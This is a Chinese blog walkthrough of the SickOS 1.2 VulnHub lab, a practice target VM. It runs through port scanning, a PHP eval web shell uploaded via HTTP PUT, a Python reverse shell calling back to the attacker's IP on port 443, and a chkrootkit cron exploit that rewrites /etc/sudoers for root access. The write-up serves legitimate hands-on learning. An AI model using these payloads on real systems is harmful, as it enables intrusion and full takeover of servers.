sickOS1.2靶机(超详细)!

最新推荐文章于 2024-03-21 22:23:42 发布
最新推荐文章于 2024-03-21 22:23:42 发布
阅读量271 收藏
点赞数
文章标签: web安全 python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68868384/article/details/132328382
版权

  1. 第一步先用nmap对该网段进行粗略扫描,找出目标主机的IP地址

    image-20230816200845195

    -sS:半开放扫描,扫描时不完成tcp的连接,这样可以使扫描更加隐蔽且更快

    -T4:paranoid (0), sneaky (1), polite (2), normal (3),侵略性(4)和疯狂(5)。前两个是为了逃避IDS(入侵检测系统)。礼貌模式减慢扫描速度以使用更少的带宽目标机器资源。正常模式是默认的,所以-T3什么也不做。侵略性模式将扫描速度提高到假设您在一个相当快速和可靠的网络上。最后,疯狂模式假定你处于开启状态一个非常快的网络或者愿意牺牲一些准确性来换取速度。

  2. 找到目标主机后,发现该网站只有没有什么别的有用的东西,接着我们再用nmap对该IP地址进行一次全端口扫描,看目标主机开放了哪些端口,发现它只开放了80和22端口

    image-20230816201156825

    image-20230816201249612

  3. 发现还是没有什么可以利用的漏洞,接着上我们的敏感页面扫描工具gobuster,我们用kali里面的字典来进行扫描

    gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.30.208 -t 30

    注:dir:使用文件/目录枚举模式,-w:指定字典,-x:扫描文件时的后缀名,-u:url地址,

    -t:线程数

    image-20230816202903301

  4. 接着我们用网站指纹工具看一下这个网站的构成,看了一下没找到关于这个模版的漏洞

    image-20230816202332631

  5. 扫描出来的一些隐藏页面,打开看了一下,看起来好像只有/test目录这个有漏洞的样子

    image-20230816202504495

  6. 看到这个页面把目录下的文件都显示的出来,那么我们看看能不能上传文件,在页面上是没有上传文件的地方,那么我们看一下这个URL支持的请求有哪几种方法,我们可以看到它容许put请求,那试一下put文件上传漏洞可不可行

    nmap --script http-methods --script-args http-methods.url-path='/test' 192.168.231.132

    image-20230816203129939

  7. 用burp进行抓包,然后修改它的数据,先尝试一下,让它输出一个phpinfo的页面出来,发现成功了,那么接下来我们就可以上蚁剑了,将蚁剑的木马写入到目标服务器中

    image-20230816203616840

    image-20230816203519215

    <?php @eval($_POST[cmd]); ?>

    image-20230816203840903

    image-20230816203947117

  8. 我们打开蚁剑连接我们刚刚写进去的木马文件,可以发现我们已经连接成功了

    image-20230816204423178

  9. 成功之后用蚁剑打开目标主机的终端,然后开始我们的致命五连击:我是谁,我在哪,你是谁,sudo权限,suid权限,发现好像没有什么可以利用的东西

    suid权限:find / -perm -4000 -type f 2>/dev/null

    image-20230816205012432

  10. 接着我们再去看/etc/cron*下的所有文件,因为crontab 是用来让使用者在固定时间或固定间隔执行程序之用,换句话说,也就是类似使用者的时程表

    ls -la /etc/cron*

    image-20230816205243240

  11. 我们在里面发现了chkrootkit工具,它是一个安全工具,不过爆出过漏洞,我们查看一下这个工具版本,看看能不能找到漏洞

    image-20230816205440449

  12. 发现在kali上可以找到该版本的漏洞,把文件下载下来看一下怎么提权

    image-20230816210556294

    image-20230816210708445

  13. 打开文件,看一下他给我们的提权方法是什么

    提权步骤:
1.在/ tmp中放入一个名为’update’的非root所有者的可执行文件。
2.以root身份运行chkrootkit,其文件/ tmp /update将以root身份执行。
如果攻击者知道管理员是定期运行chkrootkit(通过查看cron.daily获知),并且对/tmp(没有挂载noexec)有写访问权限,就可以利用该漏洞获取root权
限。

    image-20230816210836976

  14. /tmp目录下 updata文件,并赋予可执行权限

    image-20230816211056395

  15. 向update文件中写入将www-date添加到sudo组的命令,用蚁剑的终端一直写不进去,不知道什么原因,我这边就写了一个反弹shell的脚本,反弹到kali那边去,靶机防火墙可能做了端口过滤,用443端口才能通过

    import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.231.145",443))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

    echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers' > /tmp/update

    image-20230816212412235

    image-20230816213426438

    image-20230816213534130

  16. 将shell反弹到kali之后就写入成功了,sudo进行提权,成功提权
    image-20230816213806983

网安菜鸟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SickOs1.2靶场练习&小白详解&计划任务提权&chkrootkit提权
jockerboss的博客
03-07 1060
SickOs1.2靶场渗透详解&小白入门&计划任务提权&chkrootkit提权
vulnhub靶场渗透之SickOs1.2渗透教程(详细
旺仔Sec&blog
05-30 1914
靶机下载链接作者D4rk发布日期2016年4月27日难度中等这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限1、这个靶场主要考察的是支持http协议,PUT方法等2、然后就是使用多种反弹shell的方法,不过就是这里设置了规则反弹shell的端口3、最后就是靶机的提权,多多浏览靶机内的可疑文件,结合exp库来实现最终提权的目的。
靶机实操—SickOS—学习笔记
qq_46965422的博客
03-18 322
该CTF给出了一个明确的类比,即如何在网络上执行黑客策略,以在安全环境中对其进行破坏。目标是破坏网络/计算机并获得对其的管理/根权限。
Vulnhub靶机SickOs1.2
最新发布
qq_48904485的博客
03-21 738
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机:SickOs 1.2(10.0.2.15)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/
SickOs靶机实操
weixin_63650919的博客
02-26 2139
通过该命令我们可以获得与kali同一网段的IP,即可得到靶机的IP:10.4.7.136。
红队渗透靶场之SickOs1.1
xf555er的博客
12-06 1058
shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的函数定义后添加多余的字符串会触发此漏洞, 攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令执行CGI 时会调用Bash将Referer、h
Vulnhub-SickOs:1.2
cr7lyl的博客
09-11 996
记一次Vulnhub-SickOs1.2渗透过程
CTF-Difficulty:此备忘单旨在面向CTF玩家和初学者,帮助他们根据难度对CTF挑战进行分类
05-28
跟着我们目录简单的 操作系统-2.0 DE-ICE:S1.120 Hackademic-RTB1 Tr0ll 1 21 LTR:场景1 Kioptrix:1.1级Kioptrix:1.2级Kioptrix:1.3级Kioprtix:5 安全操作系统:1 订书机SickOS 1.1 SickOS 1.2 简单的凯夫吉尔...
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root...
pokemon-gpt-2
04-23
对于那些想要在本地运行此代码的人(sickos!),以下是关键文件的简要说明: image - to - text.py-将图像转换为基于文本的格式以进行训练。 text- to - image.py-将基于文本的图像格式转换为PNG。 train.py-用...
靶机渗透(九)SickOs1.2
qq_42180996的博客
05-07 2189
靶机SickOs1.2 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.远程登录(22端口) 3.目录扫描(dirb) (三)获取shell 1.方法一:P...
靶机渗透测试实战(十)——SickOs1.2渗透实战
橘子女侠
05-11 4280
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 查看靶机页面 3. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访...
kali渗透综合靶机(十二)--SickOs1.2靶机
W小哥
03-30 1612
一、靶机下载 下载链接:https://download.vulnhub.com/sickos/sick0s1.2.zip 二、SickOs1.2靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.6 靶机IP:192.168.212.9 1、主机发...
SickOs1.2 靶机渗透
weixin_44769042的博客
11-09 3801
靶机记录--9 目录 1.主机发现 2.端口扫描 3.版本信息,操作系统扫描 4.漏洞查找及利用 1> 访问网站 2> 22端口尝试ssh登陆 3> 目录扫描 4>查看该目录支持的方法 1>> nmap探测 2>> burp抓包探测 5> 写入一句话木马 6> 蚁剑连接 7> getshell 1>>将kali自带的反弹shell脚本复制出来 2>> 搞到蚁剑里来 3&gt...
SICKOS: 1.2
MD@@nr丫卡uer
12-18 364
#1寻找目标 nmap -sS -O 192.168.1.0/24 确定ip 192.168.1.124 #2扫描端口 nmap -sS -O -sV 192.168.1.124 发现开放80端口,从web入手。 #3寻找入口 查看源代码,没东⻄。 扫描一下目录 访问瞅瞅,注意到lighttpd/1.4.28 找找有没有能利用的,没有发现能利用的 使用nikto扫描一下,看到一些信息 nikto -host 192.168.1.124 nmap看一下http中开启的methods方法,有个pu
vulnhub SickOs: 1.2
箭雨镜屋
01-14 2686
渗透思路: nmap扫描---->dirb扫描---->通过PUT方法上传php反弹shell---->利用chkrootkit漏洞提权
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
SickOS靶机——PUT方式上传漏洞、版本提权
KUKULI233的博客
12-22 906
主机发现 扫描端口 扫描端口服务 上了一下网站,发现并没有什么可用信息 查找网站目录 查找网站目录 发现test下有文件 尝试看看此网页有没有PUT方法 Burp抓包修改GET为OPTIONS 发现有PUT方法 在请求头中输入PUT /test/hahaha.php HTTP/1.1,这将会通过PUT请求上传hahaha.php文件到test目录下,然后在请求体中粘贴一下恶意代码。  ...
渗透测试靶机练习-DC-1 实战
飞鱼的企鹅的博客
06-15 4203
第一次深入的了解靶机,下面把我做题的整个流程写在下面,仅供参考 靶机介绍 我所用的靶机是在vulnhub上下载的,网址如下 https://www.vulnhub.com/?page=1 里面有许多靶机可以供我们练习,我之后也将会花很多时间去练习,来提高自己的技术。对DC-1的介绍如下 大概意思啊是这个靶机需要你获得root权限,并找到所有的5个flag 入侵靶机 DC-1下载好之后,可以在VM...
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值